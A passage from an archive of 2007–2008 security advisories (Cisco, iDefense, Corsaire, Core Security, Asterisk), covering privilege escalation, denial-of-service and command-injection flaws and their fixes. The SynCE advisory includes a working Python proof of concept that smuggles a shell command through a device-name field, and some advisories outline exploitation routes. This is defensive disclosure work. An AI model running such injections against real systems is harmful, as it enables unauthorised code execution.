install -m 400 -o nobody -g nobody passwords.new passwords

7. Restart the appliance with the reboot command.

8. Re-register the node from the Management Console for which the node
manager password was changed.

Changing the Condenser Password
+------------------------------

Complete these steps:

1. Log in as fgn, and then use the su command to switch to the
superuser.

2. Stop the Condenser and Node Manager:

/etc/init.d/fgnpn<TAB> stop

Press Tab to have the interface complete the command.

3. Go to the $AVS_HOME/perfnode/passwd directory.

4. Backup the file named .htpasswd.

5. Change the password with the following command:

$AVS_HOME/perfnode/bin/htpasswd -bcm passwords.new fineground <password>

In the preceding command, passwords.new is the name of the file in
which the passwords are stored. Currently only the user fineground
is supported.

6. Install the file with the following command:

install -m 400 -o nobody -g nobody passwords.new .htpasswd

7. Restart the appliance with the reboot command.

8. Re-register the node from the Management Console for which the
Condenser password was changed.

Obtaining Fixed Software
========================

Cisco has released software updates that address this vulnerability.
Prior to deploying software, customers should consult their maintenance
provider or check the software for feature set compatibility and known
issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@... or security-alert@... for software
upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@...

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was identified through internal testing.

Status of this Notice: Final
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at :

http://www.cisco.com/warp/public/707/cisco-sa-20080123-avs.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.

* cust-security-announce@...
* first-teams@...
* bugtraq@...
* vulnwatch@...
* cisco@...
* cisco-nsp@...
* full-disclosure@...
* comp.dcom.sys.cisco@...

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------+
| Revision 1.0 | 2008-January-23 | Initial public release |
+-------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+----------------------------------------------------------------------
All contents are Copyright (C) 2006-2008 Cisco Systems, Inc. All rights
reserved.
+----------------------------------------------------------------------

Updated: Jan 21, 2008 Document ID: 100212

+----------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHl3j486n/Gc8U/uARArPpAJwJaihdYFR6B+ljPNEYLq6nCfluxgCbB85h
UYvka5159PAAagGuJDiS10E=
=PnnY
-----END PGP SIGNATURE-----

iDefense Security Advisory 01.09.08: Novell NetWare Client nicm.sys Local Privilege Escalation Vulnerability

2008-01-09T13:06:53Z

iDefense Security Advisory 01.09.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 09, 2008

I. BACKGROUND

The Novell Client software provides a workstation with access to Novell
NetWare networks as well as Novell Open Enterprise Server (OES)
services. Novell Clients can access the full range of Novell services
such as authentication via Novell eDirectory, network browsing and
service resolution, and secure and reliable file system access. More
information about the Novel Client can be found on the vendor's web
site at the following URL.

http://www.novell.com/products/clients/

II. DESCRIPTION

Local exploitation of an input validation error vulnerability within
Novell Inc.'s NetWare Client allows attackers to execute arbitrary code
within the kernel.

When the Novell NetWare Client is installed on a Windows-based operating
system, the driver nicm.sys will be loaded at system startup. This
driver allows any user to open the device "\\.\nicm" and issue IOCTLs
with a buffering mode of METHOD_NEITHER.

Due to insufficient input validation, user mode software can pass kernel
addresses as arguments to the driver. By using specially constructed
input, a malicious user can use functionality within the driver to
patch kernel addresses and execute arbitrary code in kernel mode.

III. ANALYSIS

Exploitation of this vulnerability allows a local attacker to execute
arbitrary code within the kernel. To exploit the vulnerability, the
attacker must be able execute a specially crafted executable on the
targeted computer.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in nicm.sys,
file version 3.0.0.4, as included with Novell's NetWare Client 4.91
SP4. Other versions may also be vulnerable.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Novell Inc. has addressed this vulnerability by releasing a patch for
the NetWare Client SP3. For more information visit the following URL.

http://download.novell.com/Download?buildid=4FmI89wOmg4~

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5762 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/30/2007 Initial vendor notification
11/13/2007 Initial vendor response
01/09/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com)

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

Corsaire Security Advisory: Sun J2RE DoS issue

2008-01-08T04:36:32Z

-- Corsaire Security Advisory --

Title: Sun J2RE DoS issue
Date: 05.09.06
Application: Sun JRE 5.0 prior to update 14
Environment: Sun JRE
Author: Martin O'Neal [martin.oneal@...]
Audience: General distribution
Reference: c060905-002

-- Scope --

The aim of this document is to clearly define an issue that exists with
the Sun JRE product [1] that will allow an attacker to cause the JRE and
Internet Explorer to fail, possibly losing unsaved work etc.

-- History --

Discovered: 05.09.06 (Martin O'Neal)
Vendor notified: 09.11.06
Additional analysis: (Kevin O'Reilly)
Document released: 08.01.08

-- Overview --

Sun JRE is described [1] as "the Java APIs, Java Virtual Machine
(HotSpot VM), and other components necessary to run applets and
applications written in the Java programming language".

The software provides a virtualisation layer that allows java
applications to be run across platforms and operating systems. These
java applications can be delivered to the JVM via a number of
mechanisms, and are commonly downloaded from a web server or less
commonly, can be embedded within HTML content.

-- Analysis --

The RFC2397 [2] standard allows for the encoding of java applets within
a URI, allowing it to be embedded in an HTML document.

If an applet is encoded into the data parameter of an object tag with an
undefined "name" attribute, and is then passed to Internet Explorer,
then when the application is unencoded and passed in turn to the JVM it
causes a null pointer exception to occur in jpiexp32.dll.

-- Recommendations --

Upgrade to a version of the Sun JRE product that does not exhibit this
issue (such as Sun JRE 6.0 or JRE 5.0 update 14), and uninstall all
effected versions. This is important, as it is possible for an attacker
to specify which local VM will be used to run an applet (and so select a
vulnerable version).

-- CVE --

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-0012 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardises names for
security problems.

-- References --

[1] http://java.sun.com/javase/
[2] http://www.ietf.org/rfc/rfc2397

This bug is tracked by Sun as 6511363.

-- Revision --

a. Initial release.

-- Distribution --

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. Corsaire
accepts no responsibility for any damage caused by the use or misuse of
this information.

-- Disclaimer --

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. Corsaire
accepts no responsibility for any damage caused by the use or misuse of
this information.

-- About Corsaire --

Corsaire are a leading information security consultancy, founded in 1997
in Guildford, Surrey, UK. Corsaire bring innovation, integrity and
analytical rigour to every job, which means fast and dramatic security
performance improvements. Our services centre on the delivery of
information security planning, assessment, implementation, management
and vulnerability research.

A free guide to selecting a security assessment supplier is available at
http://www.penetration-testing.com

Copyright 2006 Corsaire Limited. All rights reserved.

iDefense Security Advisory 01.07.08: Motorola netOctopus Agent MSR Write Privilege Escalation Vulnerability

2008-01-07T13:09:53Z

iDefense Security Advisory 01.07.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 07, 2008

I. BACKGROUND

Motorola netOctopus is an asset management agent. It is used to deploy
software, monitor performance, and configure client machines from a
central administrative console. More information can be found on the
vendor's site at the following URL.

http://www.netopia.com/software/products/netoctopus/

II. DESCRIPTION

Local exploitation of a privilege escalation vulnerability in Motorola
Inc.'s netOctopus could allow an attacker to execute arbitrary code in
kernel context.

The netOctopus Agent software is supposed to be installed on all client
machines. It includes a driver, nantsys.sys, that is loaded at system
boot time. This driver exposes a device interface, \\.\NantSys, that is
writable by all users.

This driver includes functionality for reading and writing arbitrary CPU
Model Specific Registers (MSRs). Changing MSR values allows tuning of
various low level CPU operations. By modifying SYSENTER_EIP_MSR, is is
possible to execute arbitrary attacker supplied code in kernel context
by executing a sysenter instruction.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code in kernel context. Unsuccessful attempts may result in a system
crash. However, due to the nature of the vulnerability exploitation is
extremely reliable.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
5.0.0.115 of the nantsys.sys driver as included with netOctopus version
5.1.2 build 1011. Previous versions may also be affected.

V. WORKAROUND

Remove write permissions for the Everyone group for the \\.\NantSys
device. This can be accomplished by using a tool like WinObj. This will
prevent regular users from writing to the device.

VI. VENDOR RESPONSE

To address this vulnerability, Motorola Inc. has made a script available
to remove the affected driver from the system. For more information,
consult their advisory at the following URL.

http://www.netopia.com/support/software/technotes/netoctopus/Removing_the_nantsys_Driver.pdf
http://www.netopia.com/support/software/technotes/netoctopus/removeNantsys.vbs

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5761 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/07/2007 Initial vendor notification
09/07/2007 Initial vendor response
01/07/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

CORE-2007-1106: SynCE Remote Command Injection

2008-01-07T11:36:11Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies – CoreLabs Advisory
http://www.coresecurity.com/corelabs

SynCE Remote Command Injection

*Advisory Information*

Title: SynCE Remote Command Injection
Advisory ID: CORE-2007-1106
Advisory URL: http://www.coresecurity.com/?action=item&id=2070
Date published: 2008-01-07
Date of last update: 2008-01-03
Vendors contacted: SynCE team
Release mode: Coordinated release

*Vulnerability Information*

Class: Input validation error
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: N/A
CVE Name: N/A

*Vulnerability Description*

SynCE is an open source project, whose objective is to provide a way of
communicating with a Windows CE or Pocket PC device, from a computer
running Linux, *BSD or other unices. For more information see
http://www.synce.org/

The vdccm daemon (part of the SynCE package) is vulnerable to a remote
command injection, which can be exploited by malicious remote attackers.
The vulnerability is due to the vdccm daemon not properly sanitizing
certain input before using it to invoke external scripts. This can be
exploited to execute arbitrary commands with the privileges of the vdccm
daemon by sending specially crafted requests.

*Vulnerable packages*

. Synce-dccm since version 0.92

*Non-vulnerable packages*

. Synce-dccm 0.91 and earlier.
. SynCE-dccm 0.10.1

*Vendor Information, Solutions and Workarounds*

This vulnerability has been fixed in SynCE-dccm 0.10.1, available at
http://sourceforge.net/projects/synce/.

*Credits*

This vulnerability was discovered and researched by Alfredo Ortega and
Oren Isacson from Core Security Technologies.

*Technical Description / Proof of Concept Code*

The vdccm daemon listens on port 5679 for incoming connections from a
Windows CE device.
The command injection exist on the name of the connected device. The
code at src/utils.cpp, function Utils::runScripts contains the
following code:

string command = string(path) + " " + action + " " + deviceName;
system(command.c_str());

The contents of the string variable "deviceName" is controlled by the
attacker.

The next python proof of concept script will remotely create an empty
file named "/tmp/vulnerability" when used on a FreeBSD host running the
vulnerable daemon.

- ---------------------------
import socket, struct
import time
def AtoWChar(string):
return ''.join([x+chr(0) for x in string])

HOST = '192.168.XXX.XXX'
PORT = 5679
c= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect((HOST, PORT))
buf="\x00"*0x18
buf+='\x30\x00\x00\x00'
buf+='\x30\x00\x00\x00'
buf+='\x30\x00\x00\x00'
buf+="\x00"*12
string=AtoWChar("&/usr/bin/touch /tmp/vulnerability")
buf+=string+"\x00\x00"+"\x00"*12
c.send(struct.pack("L",63+len(string))+buf+"\x00" )
- ---------------------------

NOTE: for this proof of concept to work, a script file is needed on the
"$home$/.synce/scripts" directory. Some linux distributions ship with
scripts on this directory by default.

*Report Timeline*

2007-11-12: Core notifies the SynCE team of the vulnerability.
2007-11-13: Technical details sent by Core to SynCE team.
2007-11-22: SynCE notifies Core that a fix has been produced, and will
be released in the next SynCE official release.
2007-12-20: SynCE releases version 0.10.1, which fixes this vulnerability.
2008-01-07: CORE-2007-1106 advisory is published.

*References*

http://synce.sourceforge.net/synce/dccm.php
http://synce.sourceforge.net/synce/architecture.php

*About Corelabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core augments its
leading technology solution with world-class security consulting
services, including penetration testing and software security auditing.
Based in Boston, MA and Buenos Aires, Argentina, Core Security
Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com

*DISCLAIMER*

The contents of this advisory are copyright (c) 2008 CORE Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*PGP/GPG KEYS*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHgn8ryNibggitWa0RApswAJ9ey+xpJ3XMB4UNJyVX8y8riyNOdQCfQgAR
DddKr++Y5HTDdBlzOd/vjRw=
=c7rd
-----END PGP SIGNATURE-----

iDefense Security Advisory 12.24.07: Novell ZENworks Endpoint Security Management Local Privilege Escalation Vulnerability

2008-01-04T13:42:46Z

iDefense Security Advisory 12.24.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 24, 2007

I. BACKGROUND

Novell ZENworks Endpoint Security Management (ESM) Security Client
provides centrally managed, policy based firewall protection for
clients. It is designed to be installed on all workstations within the
enterprise. More information is available on the vendor's site at the
following URL.

http://www.novell.com/products/zenworks/endpointsecuritymanagement/

II. DESCRIPTION

Local exploitation of a privilege escalation vulnerability in Novell
ZENworks Endpoint Security Management allows attackers to execute
arbitrary code with SYSTEM privileges.

When the ZENworks ESM Security Client is installed on a workstation, the
STEngine service is set to run under the local SYSTEM account. This
service is implemented within the following executable.

File Name: STEngine.exe (1,847,296 bytes)
Version: 3.5.0.20
MD5: B5402A1EC8D04130304EBA89AF843916

The service provides functionality for any user to generate a diagnostic
report in order to aid in product troubleshooting. During report
generation, STEngine attempts to execute various scripts by spawning
command shells to gather system information. These scripts are
dynamically generated in a directory which all users may write to.

STEngine will also attempt to locate a command shell in this directory
and execute it if it is found. If a malicious local user places a
binary named "cmd.exe" in this directory, STEngine will execute it with
SYSTEM level privileges.

III. ANALYSIS

Exploitation allows unprivileged local users to take complete control of
the affected system.

Exploitation is trivial and does not require any special tools or coding
ability. If an attacker desires an interactive command prompt, a small
wrapper application will be required in order to ensure that the
command window is visible after execution.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in
STEngine.exe version 3.5.0.20 as included with Novell Inc's ZENworks
Endpoint Security Management 3.5. Other versions may also be affected.

V. WORKAROUND

iDefense is unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability by releasing version 3.5.0.82 of
Endpoint Security Management. To download this new version, visit the
following URL.

http://download.novell.com/Download?buildid=5Y6xbs-OKLE~

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5665 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/24/2007 Initial vendor notification
09/25/2007 Initial vendor response
12/24/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

AST-2008-001: Crash from transfer using BYE with Also header

2008-01-02T13:57:55Z

Asterisk Project Security Advisory - AST-2008-001

+------------------------------------------------------------------------+
| Product | Asterisk |
|---------------------+--------------------------------------------------|
| Summary | Remote Crash Vulnerability in SIP channel driver |
|---------------------+--------------------------------------------------|
| Nature of Advisory | Denial of Service |
|---------------------+--------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|---------------------+--------------------------------------------------|
| Severity | Critical |
|---------------------+--------------------------------------------------|
| Exploits Known | No |
|---------------------+--------------------------------------------------|
| Reported On | December 26, 2007 |
|---------------------+--------------------------------------------------|
| Reported By | Grey VoIP (bugs.digium.com user greyvoip) |
|---------------------+--------------------------------------------------|
| Posted On | January 2, 2008 |
|---------------------+--------------------------------------------------|
| Last Updated On | January 2, 2008 |
|---------------------+--------------------------------------------------|
| Advisory Contact | Joshua Colp <jcolp@...> |
|---------------------+--------------------------------------------------|
| CVE Name | |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Description | The handling of the BYE with Also transfer method was |
| | broken during the development of Asterisk 1.4. If a |
| | transfer attempt is made using this method the system |
| | will immediately crash upon handling the BYE message due |
| | to trying to copy data into a NULL pointer. It is |
| | important to note that a dialog must have already been |
| | established and up in order for this to happen. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Resolution | A fix has been added so that the BYE with Also transfer |
| | method now properly allocates and uses the transfer data |
| | structure. It will no longer try to copy data into a NULL |
| | pointer and will operate properly. |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.0.x | Unaffected |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.2.x | Unaffected |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source | 1.4.x | All versions prior to |
| | | 1.4.17 |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | A.x.x | Unaffected |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | B.x.x | Unaffected |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition | C.x.x | All versions prior to |
| | | C.1.0-beta8 |
|----------------------------+-------------+-----------------------------|
| AsteriskNOW | pre-release | All versions prior to beta7 |
|----------------------------+-------------+-----------------------------|
| Asterisk Appliance | SVN | All versions prior to |
| Developer Kit | | Asterisk 1.4 revision 95946 |
|----------------------------+-------------+-----------------------------|
| s800i (Asterisk Appliance) | 1.0.x | All versions prior to |
| | | 1.0.3.4 |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|---------------+--------------------------------------------------------|
| Asterisk Open | 1.4.17, available from |
| Source | http://downloads.digium.com/pub/telephony/asterisk |
|---------------+--------------------------------------------------------|
| Asterisk | C.1.0 |
| Business | |
| Edition | |
|---------------+--------------------------------------------------------|
| AsteriskNOW | Beta7, available from http://www.asterisknow.org/. |
| | |
| | Beta5 and Beta6 users can update using the system |
| | update feature in the appliance control panel. |
|---------------+--------------------------------------------------------|
| Asterisk | Asterisk 1.4 revision 95946. Available by performing |
| Appliance | an svn update of the AADK tree. |
| Developer Kit | |
|---------------+--------------------------------------------------------|
| s800i | 1.0.3.4 |
| (Asterisk | |
| Appliance) | |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Links | http://bugs.digium.com/view.php?id=11637 |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://downloads.digium.com/pub/security/AST-2008-001.pdf and |
| http://downloads.digium.com/pub/security/AST-2008-001.html |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Revision History |
|------------------------------------------------------------------------|
| Date | Editor | Revisions Made |
|------------------+--------------------+--------------------------------|
| 2008-01-02 | Joshua Colp | Initial Release |
+------------------------------------------------------------------------+

Asterisk Project Security Advisory - AST-2008-001
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.

Cisco Security Advisory: Application Inspection Vulnerability in Cisco Firewall Services Module

2007-12-19T07:20:00Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Application Inspection Vulnerability in Cisco
Firewall Services Module

Advisory ID: cisco-sa-20071219-fwsm
============

Revision 1.0
============

Last Updated 2007 December 19 1600 UTC (GMT)

For Public Release 2007 December 19 1600 UTC (GMT)

Summary
=======

A vulnerability exists in the Cisco Firewall Services Module (FWSM)
- - - a high-speed, integrated firewall module for Cisco Catalyst 6500
switches and Cisco 7600 Series routers, that may result in a reload
of the FWSM. The only affected FWSM System Software Version is
3.2(3).

There are no known instances of intentional exploitation of this
issue. However, Cisco has observed data streams that appear to be
unintentionally triggering this vulnerability.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5584
has been assigned to this vulnerability.

Cisco will release free software updates that address this
vulnerability.

A workaround that mitigates this vulnerability is available.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml

Affected Products
=================

Vulnerable Products
+------------------

The FWSM is vulnerable if running System Software version 3.2(3).

To determine if the FWSM is vulnerable, issue the "show module"
command-line interface (CLI) command from Cisco IOS or Cisco CatOS
to identify what modules and sub-modules are installed in the
system.

The following example shows a system with a Firewall Service Module
(WS-SVC-FWM-1) installed in slot 4.

switch#show module
Mod Ports Card Type Model Serial No.
--- ----- -------------------------------------- ----------------- -----------
1 48 SFM-capable 48 port 10/100/1000mb RJ45 WS-X6548-GE-TX SAxxxxxxxxx
4 6 Firewall Module WS-SVC-FWM-1 SAxxxxxxxxx
5 2 Supervisor Engine 720 (Active) WS-SUP720-BASE SAxxxxxxxxx
6 2 Supervisor Engine 720 (Hot) WS-SUP720-BASE SAxxxxxxxxx

After locating the correct slot, issue the show module <slot number>
command to identify the software version that is running.

switch#show module 4
Mod Ports Card Type Model Serial No.
--- ----- -------------------------------------- ----------------- -----------
4 6 Firewall Module WS-SVC-FWM-1 SAxxxxxxxxx

Mod MAC addresses Hw Fw Sw Status
--- --------------------------------- ------ ------------ ------------ -------
4 0003.e4xx.xxxx to 0003.e4xx.xxxx 3.0 7.2(1) 3.2(3) Ok

The preceding example shows that the FWSM is running version 3.2(3)
as indicated by the column under "Sw" above.

Note: Recent versions of Cisco IOS will show the software version of
each module in the output from the show module command; therefore,
executing the show module <slot number> command is not necessary.

Alternatively, the information can also be obtained directly from the
FWSM through the show version command as seen in the following
example.

FWSM#show version
FWSM Firewall Version 3.2(3)

Customers who use the Cisco Adaptive Security Device Manager (ASDM)
to manage their devices can find the version of the software displayed
in the table in the login window or in the upper left corner of the
ASDM window. The version notation is similar to the following example.

FWSM Version: 3.2(3)

Products Confirmed Not Vulnerable
+--------------------------------

* FWSM System Software versions 3.2(2) and earlier.
* FWSM System Software versions 3.1(x).
* FWSM System Software versions 1.x(y) and 2.x(y).
* The Cisco PIX 500 Series Security Appliance (PIX)
* The Cisco 5500 Series Adaptive Security Appliance (ASA).

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

A vulnerability exists in the processing of data in the
control-plane path with Layer 7 Application Inspections, that may
result in a reload of the FWSM. The vulnerability can be triggered
with standard network traffic, which is passed through the
Application Layer Protocol Inspection process.

The only FWSM release affected by this vulnerability is FWSM System
Software version 3.2(3).

This vulnerability is documented in Cisco bug ID CSCsl08519.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

CSCsl08519 - FWSM Version 3.2.3 System Software may crash with
Application Layer Protocol Inspection
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete

CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in a reload of
the FWSM. Repeated exploitation will result in a sustained denial of
service attack.

Software Versions and Fixes
===========================

When considering software upgrades, consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

FWSM software version 3.2(4) contains the fixes for the vulnerability
described in this document and will be available for download the week
beginning 31st December 2007.

FWSM software will be available for download from the following
location on cisco.com:

http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2

Workarounds
===========

* Disable the TCP normalizing function

Disabling the TCP normalizing function in the FWSM will mitigate
this vulnerability.

